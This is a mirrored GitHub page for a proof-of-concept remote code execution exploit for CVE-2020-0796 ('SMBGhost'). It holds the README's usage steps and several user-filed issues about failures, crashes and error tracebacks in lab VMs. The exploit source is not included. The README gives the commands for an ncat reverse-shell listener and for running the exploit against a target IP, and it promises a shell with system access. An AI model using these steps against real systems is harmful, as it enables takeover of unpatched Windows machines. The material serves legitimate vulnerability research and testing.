jamf / cve-2020-0796-rce-poc Goto Github PK

CVE-2020-0796 Remote Code Execution POC

Batchfile 2.79% Python 68.33% Assembly 28.88%

cve-2020-0796 poc smbghost remote-code-execution rce

cve-2020-0796-rce-poc's Introduction

CVE-2020-0796 Remote Code Execution POC

(c) 2020 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes
Remote Code Execution POC for CVE-2020-0796 / "SMBGhost"
Expected outcome: Reverse shell with system access.
Intended only for educational and testing in corporate environments.
ZecOps takes no responsibility for the code, use at your own risk.
Please contact [email protected] if you are interested in agent-less DFIR tools for Servers, Endpoints, and Mobile Devices to detect SMBGhost and other types of attacks automatically.

Usage

Make sure Python and ncat are installed.
Run calc_target_offsets.bat on the target computer, and adjust the offsets at the top of the SMBleedingGhost.py file according to the script output (also see the note below).
Run ncat with the following command line arguments:

ncat -lvp <port>

Where <port> is the port number ncat will be listening on.
Run SMBleedingGhost.py with the following command line arguments:

SMBleedingGhost.py <target_ip> <reverse_shell_ip> <reverse_shell_port>

Where <target_ip> is the IP address of the target, vulnerable computer. <reverse_shell_ip> and <reverse_shell_port> are the IP address and the port number ncat is listening on.
If all goes well, ncat will display a shell that provides system access to the target computer.

Note: You might be wondering why it's necessary to run the calc_target_offsets.bat script on the target computer, and doesn't it defeat the whole point of the remote code execution being remote. These offsets are not random, and are the same on all Windows instances of the same Windows version. One could make the attack more universal by detecting the target Windows version and adjusting the offsets automatically, or by not relying on them altogether, but it's only a POC and we did what was simpler. We also see it as a good thing that the POC is not universal, and is not convenient for uses other than testing and education.

Target Environment

Windows 10 Versions 1903 and 1909 are affected. Unpatched Windows 10 1903 versions aren't supported due to a null dereference bug in Windows (fixed in KB4512941).

Due to the nature of the exploitation, the POC works best for targets running on a computer (or a VM) with a single logical processor. Targets with more than one logical processor running in VirtualBox should be supported as well, but the POC is less reliable in this case. Other targets might not be supported. For details, refer to our technical writeup below.

Technical Writeup

References

cve-2020-0796-rce-poc's People

Contributors

Stargazers

Watchers

Forkers

syriusbughunt c4nc raystyle slowmistio ridter xinbs crackercat baolqinfosec yut0u gdraperi slox3r dor0n flatl1neapt rc-chuah raynersec kennyzeng singularidad isarabia92 dev20190101 rwincey fengjixuchui jymcheong linhlhq bravery9 agaisme killvxk mlynchcogent hello-xbugs zhouzu kuluary gavz josephcespinosa berkotako adelittle pt001 0xr0 evilares geekfire waterman178 thetraker saadhoucem jack51706 quinn-yan preventions punittailor55 xstpl tobey123 309746069 erickie007 hhy5277 oakicode cbwang505 0x3e6 limkokholefork asim06 ilbaroni snyiu100 bb33bb 2217936322 3v1lw1th1n anggadaz15 whoamisysteminfo c0de3 gxlioper cve-vuln armorunicorn pirenga rafet-luckyness lotus321 geoveza ttuanhung jg789346bnfgewrew09876345 gitscami penterhub mambrui m4rm0k freeide seselook mizaro wxh0000mm 3453-315h 5l1v3r1 leftp c0demake shhoya chingru shankar-lucideus spensercai akpotter denisoancea h4xl0r gerryhjs k1p2y3 shutupandhack-club ctflag rakhithjk johnboomi ohio813 gmohlamo apollon33

cve-2020-0796-rce-poc's Issues

Remote code execution POC

No KB4512941, but target not vulnerable.

Hello,

I ran the ROC and double checked the Offsets values.

The server 2019 is a VM and not patched with KB4512941. (but patched up to March, 2020)

ROC respond with "Target is not vulnerable"

Is this expected behavior?

Thanks

Works but I get bluescreen after a few minutes on VM windows 10 1909

The POC works on my VM windows 10 1909 but if I use the reverse shell at all even just a whoami command it will cause the VM to BSOD after a few minutes of not typing any commands.

Only output 3 argments when running the .bat file in windows10 1909 running on VMware 14

I can get all the argments needed on my own windows10, but only 3 on target Windows 10. The three argments are '''srvnet!imp_IoSizeofWorkItem''','''srvnet!imp_RtlCopyUnicodeString''' and '''nt!IoSizeofWorkItem'''.

I also tried adding the rest two argments copied from my local real windows to SMBleedingGhost.py, but when I ran the script, the virtual windows10 would soon got a bluescreen.

So I'm just wonderring what's going on.

I'll be really grateful for your quick response!

1909 Leak failed, retrying

win10 1909, 10.0.18363
Hotfix:
[01]: KB4515871
[02]: KB4513661
[03]: KB4516115
[04]: KB4517245
[05]: KB4521863
[06]: KB4517389

When I run the POC, it always said "Leak failed, retrying"

Target is not vulnerable and Target VM is Windows 10 Pro version: 1909

Hi,

I have encounter an issue when running the SMBleedingGhost.py script and the issue message is -> Target is not vulnerable.

I have followed the instructions in the readme.md and i ran the 2 scripts in the following sequential ways.

1/ Run calc_target_offsets.bat on the Target VM (Windows 10 Pro - version 1909) and obtain the offset values.

2/ Amend the SMBleedingGhost.py script (after obtained the offset values from the target VM) and modify the offset value in the SMBleedingGhost.py script.

3/ Run the SMBleedingGhost.py with the necessary parameters and below is the command output after executed:

root@attackerpc:/home/labadmin/Desktop/CVE-2020-0796-RCE-POC-master# python3.8 SMBleedingGhost.py 192.168.75.128 (target IP) 192.168.75.129 (reverse shell IP) 4444 (reverse port number)
CVE-2020-0796 Remote Code Execution POC
(c) 2020 ZecOps, Inc.

Target is not vulnerable
root@attackerpc:/home/labadmin/Desktop/CVE-2020-0796-RCE-POC-master#

My Windows 10 VM information:

vRAM : 4GB
Number of Processors : 1
Number of cores per Processors : 1
OS information : Windows 10 Pro Version 1909 (OS Build 18363.900)

Please help and advise why this is happening. In addition, i have a scan results to determine that my Windows 10 VM is vulnerable to the vulnerability. Let me know if you need the scan results.

Thank you

CVE 2020-0796

Hi the exploit is working fine but I get this error. sock.connect((ip_address, 445))
TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.

It crashes my Victim. Tried many works. working on it for days. Any fix?

blue screen in virtualbox win10 1903

Hi!
virtualbox+win10 1903 business+python3.7+closed WAF+closed security center
then cause blue screen, and no shell return.

AttributeError: module 'ctypes' has no attribute 'windll'

Hi,

i have received this error message after executed the SMBleedingGhost.py script and the output of the error message is:

root@attackerpc:/home/labadmin/Desktop/CVE-2020-0796-RCE-POC-master# python3.8 SMBleedingGhost.py 192.168.75.131 192.168.75.129 4444
CVE-2020-0796 Remote Code Execution POC
(c) 2020 ZecOps, Inc.

Traceback (most recent call last):
File "SMBleedingGhost.py", line 909, in
exploit(target_ip, reverse_shell_ip, int(reverse_shell_port))
File "SMBleedingGhost.py", line 854, in exploit
allocation_pool_object_ptr = leak_allocation_pool_object_ptr(ip_address)
File "SMBleedingGhost.py", line 522, in leak_allocation_pool_object_ptr
address = leak_ptr(ip_address, ptr_offset, ptr_list)
File "SMBleedingGhost.py", line 480, in leak_ptr
byte_value = leak_ptr_byte(ip_address, ptr_offset + byte_index, ptr_list)
File "SMBleedingGhost.py", line 454, in leak_ptr_byte
if leak_if_ptr_byte_larger_than_value(ip_address, byte_offset, ptr_list, mid):
File "SMBleedingGhost.py", line 414, in leak_if_ptr_byte_larger_than_value
data = b'B'*offset + compress(payload)
File "SMBleedingGhost.py", line 272, in compress
RtlCompressBuffer = ctypes.windll.ntdll.RtlCompressBuffer
AttributeError: module 'ctypes' has no attribute 'windll'
root@attackerpc:/home/labadmin/Desktop/CVE-2020-0796-RCE-POC-master#

Please help and i would appreciate the assistance. =)

jamf / cve-2020-0796-rce-poc Goto Github PK

cve-2020-0796-rce-poc's Introduction

CVE-2020-0796 Remote Code Execution POC

Usage

Target Environment

Technical Writeup

References

cve-2020-0796-rce-poc's People

Contributors

Stargazers

Watchers

Forkers

cve-2020-0796-rce-poc's Issues

Recommend Projects

Recommend Topics

Recommend Org

Jobs